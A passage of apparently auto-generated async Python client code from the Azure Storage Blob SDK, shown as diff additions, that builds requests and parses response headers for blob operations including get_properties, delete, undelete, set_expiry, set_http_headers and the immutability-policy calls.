response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + download.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_properties( # pylint: disable=inconsistent-return-statements + self, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Get Properties operation returns all user-defined metadata, standard HTTP properties, and + system properties for the blob. It does not return the content of the blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. 
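Publicly this operation is exposed as get_blob_properties(), whose BlobProperties result mirrors the response headers deserialized below. A minimal sketch, again assuming blob is an authenticated aio BlobClient:

async def show_properties(blob) -> None:
    props = await blob.get_blob_properties()
    # BlobProperties fields correspond to the headers below: ETag,
    # Last-Modified, lease state, server-side encryption, and so on.
    print(props.etag, props.last_modified, props.lease.state)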
Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_get_properties_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + 
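+ # Editor's note: the block below copies each documented response header into
+ # response_headers before the optional `cls` callback sees them. Callers normally
+ # reach this operation through the public client rather than this generated layer;
+ # a minimal sketch, assuming a placeholder connection string `conn_str`:
+ #
+ #     from azure.storage.blob.aio import BlobClient
+ #
+ #     async def show_props() -> None:
+ #         async with BlobClient.from_connection_string(conn_str, "mycontainer", "blob.txt") as bc:
+ #             props = await bc.get_blob_properties()  # wraps this get_properties call
+ #             print(props.etag, props.size, props.last_modified)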
response_headers = {} + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-creation-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-creation-time')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['x-ms-or-policy-id']=self._deserialize('str', response.headers.get('x-ms-or-policy-id')) + response_headers['x-ms-or']=self._deserialize('{str}', response.headers.get('x-ms-or')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-incremental-copy']=self._deserialize('bool', response.headers.get('x-ms-incremental-copy')) + response_headers['x-ms-copy-destination-snapshot']=self._deserialize('str', response.headers.get('x-ms-copy-destination-snapshot')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', 
response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-access-tier']=self._deserialize('str', response.headers.get('x-ms-access-tier')) + response_headers['x-ms-access-tier-inferred']=self._deserialize('bool', response.headers.get('x-ms-access-tier-inferred')) + response_headers['x-ms-archive-status']=self._deserialize('str', response.headers.get('x-ms-archive-status')) + response_headers['x-ms-access-tier-change-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-access-tier-change-time')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['x-ms-is-current-version']=self._deserialize('bool', response.headers.get('x-ms-is-current-version')) + response_headers['x-ms-tag-count']=self._deserialize('long', response.headers.get('x-ms-tag-count')) + response_headers['x-ms-expiry-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-expiry-time')) + response_headers['x-ms-blob-sealed']=self._deserialize('bool', response.headers.get('x-ms-blob-sealed')) + response_headers['x-ms-rehydrate-priority']=self._deserialize('str', response.headers.get('x-ms-rehydrate-priority')) + response_headers['x-ms-last-access-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-last-access-time')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + response_headers['x-ms-legal-hold']=self._deserialize('bool', response.headers.get('x-ms-legal-hold')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + get_properties.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def delete( # pylint: disable=inconsistent-return-statements + self, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + timeout: Optional[int] = None, + delete_snapshots: Optional[Union[str, "_models.DeleteSnapshotsOptionType"]] = None, + request_id_parameter: Optional[str] = None, + blob_delete_type: Optional[str] = "Permanent", + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """If the storage account's soft delete feature is disabled, then when a blob is deleted it is + permanently removed from the storage account. If the storage account's soft delete feature is + enabled, then when a blob is deleted it is marked for deletion and becomes inaccessible + immediately. However, the blob service retains the blob or snapshot for the number of days + specified by the DeleteRetentionPolicy section of [Storage service properties] + (Set-Blob-Service-Properties.md). After the specified number of days has passed, the blob's + data is permanently removed from the storage account. Note that you continue to be charged for + the soft-deleted blob's storage until it is permanently removed. Use the List Blobs API and + specify the "include=deleted" query parameter to discover which blobs and snapshots have been + soft deleted. 
You can then use the Undelete Blob API to restore a soft-deleted blob. All other + operations on a soft-deleted blob or snapshot cause the service to return an HTTP status code + of 404 (ResourceNotFound). + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see Creating + a Snapshot of a Blob. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param delete_snapshots: Required if the blob has associated snapshots. Specify one of the + following two options: include: Delete the base blob and all of its snapshots. only: Delete + only the blob's snapshots and not the blob itself. Default value is None. + :type delete_snapshots: str or ~azure.storage.blob.models.DeleteSnapshotsOptionType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_delete_type: Optional. Only possible value is 'permanent', which specifies to + permanently delete a blob if blob soft delete is enabled. Possible values are "Permanent" or + None. Default value is "Permanent". + :type blob_delete_type: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. 
+ :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_delete_request( + url=self._config.url, + version=self._config.version, + snapshot=snapshot, + version_id=version_id, + timeout=timeout, + lease_id=_lease_id, + delete_snapshots=delete_snapshots, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_delete_type=blob_delete_type, + template_url=self.delete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [202]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def undelete( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """Undelete a blob that was previously soft deleted. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "undelete". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "undelete") # type: str + + + request = build_undelete_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.undelete.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + undelete.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_expiry( # pylint: disable=inconsistent-return-statements + self, + expiry_options: Union[str, "_models.BlobExpiryOptions"], + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + expires_on: Optional[str] = None, + **kwargs: Any + ) -> None: + """Sets the time a blob will expire and be deleted. + + :param expiry_options: Required. Indicates mode of the expiry time. + :type expiry_options: str or ~azure.storage.blob.models.BlobExpiryOptions + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param expires_on: The time to set the blob to expire. Default value is None. + :type expires_on: str + :keyword comp: comp. Default value is "expiry". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "expiry") # type: str + + + request = build_set_expiry_request( + url=self._config.url, + comp=comp, + version=self._config.version, + expiry_options=expiry_options, + timeout=timeout, + request_id_parameter=request_id_parameter, + expires_on=expires_on, + template_url=self.set_expiry.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_expiry.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_http_headers( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set HTTP Headers operation sets system properties on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. 
Default value is "properties". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "properties") # type: str + + _blob_cache_control = None + _blob_content_type = None + _blob_content_md5 = None + _blob_content_encoding = None + _blob_content_language = None + _lease_id = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + _blob_content_disposition = None + if blob_http_headers is not None: + _blob_cache_control = blob_http_headers.blob_cache_control + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_disposition = blob_http_headers.blob_content_disposition + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + + request = build_set_http_headers_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + blob_cache_control=_blob_cache_control, + blob_content_type=_blob_content_type, + blob_content_md5=_blob_content_md5, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + lease_id=_lease_id, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + blob_content_disposition=_blob_content_disposition, + request_id_parameter=request_id_parameter, + template_url=self.set_http_headers.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + 
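+ # Editor's note: a minimal sketch of reaching this operation through the public
+ # client, which maps a ContentSettings object onto the BlobHTTPHeaders parameter
+ # group unpacked above (`conn_str` is a placeholder):
+ #
+ #     from azure.storage.blob import ContentSettings
+ #     from azure.storage.blob.aio import BlobClient
+ #
+ #     async def set_headers() -> None:
+ #         async with BlobClient.from_connection_string(conn_str, "mycontainer", "blob.txt") as bc:
+ #             await bc.set_http_headers(content_settings=ContentSettings(content_type="text/plain", cache_control="max-age=3600"))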
response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_http_headers.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_immutability_policy( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Immutability Policy operation sets the immutability policy on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param immutability_policy_expiry: Specifies the date time when the blob's immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this default + value may result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + + _if_unmodified_since = None + if modified_access_conditions is not None: + _if_unmodified_since = modified_access_conditions.if_unmodified_since + + request = build_set_immutability_policy_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + if_unmodified_since=_if_unmodified_since, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + template_url=self.set_immutability_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-immutability-policy-until-date']=self._deserialize('rfc-1123', response.headers.get('x-ms-immutability-policy-until-date')) + response_headers['x-ms-immutability-policy-mode']=self._deserialize('str', response.headers.get('x-ms-immutability-policy-mode')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def delete_immutability_policy( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + **kwargs: Any + ) -> None: + """The Delete Immutability Policy operation deletes the immutability policy on the blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + Setting + Timeouts for Blob Service Operations. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :keyword comp: comp. Default value is "immutabilityPolicies". Note that overriding this default + value may result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "immutabilityPolicies") # type: str + + + request = build_delete_immutability_policy_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + template_url=self.delete_immutability_policy.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + delete_immutability_policy.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_legal_hold( # pylint: disable=inconsistent-return-statements + self, + legal_hold: bool, + 